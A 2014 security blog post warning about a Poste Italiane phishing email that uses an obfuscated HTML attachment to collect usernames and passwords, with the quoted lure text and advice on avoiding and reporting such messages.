OFFICIAL SECURITY BLOG
June 30, 2014 | BY Christopher Boyd
Currently landing in mailboxes: a Poste italiane phish asking for username and password information.
The potentially somewhat off-kilter Google Translation reads as follows:
Dear customer Poste.it,
A new range of online services is now available!
To take advantage of the new online services Poste.it must first become VERIFIED USER.
We will include the necessary documentation to enable protection.
The client, after receiving the documents and verifying their completeness and accuracy, will immediately activate your “User Name Verified.” You will be notified by telephone of such activation.
They placed a typo in the From field – “Poste Italiene”, instead of “Italiane”. As for the meat of the mail itself, the phish comes in the form of a html attachment designed to be opened in the victim’s browser.
They’ve attempted to hide the code used in the html file by using a free web-based encryption tool – other evasion tactics have been seen before where Poste Italiane phishes are concerned.
Unfortunately for them, this isn’t enough to deter anybody even mildly curious about what lurks inside the code.
It looks like the spammers are using hacked sites in this spamrun, though fortunately they appear to be in the process of being cleaned up.
Even so, recipients of these mails should steer clear of clicking links inside attachments, or entering their user details on supplied forms. In fact, opening attachments at all from suspicious emails should be a no-go given the possibility of them being loaded up with exploits.
Phishing with attachments is a popular hobby for scammers, and we shouldn’t make it worth their while – if your webmail doesn’t detect the spam by default, report it and add to your blocklist.
Additionally, you can always report Poste Italiane phishes to CERT di Poste Italiane.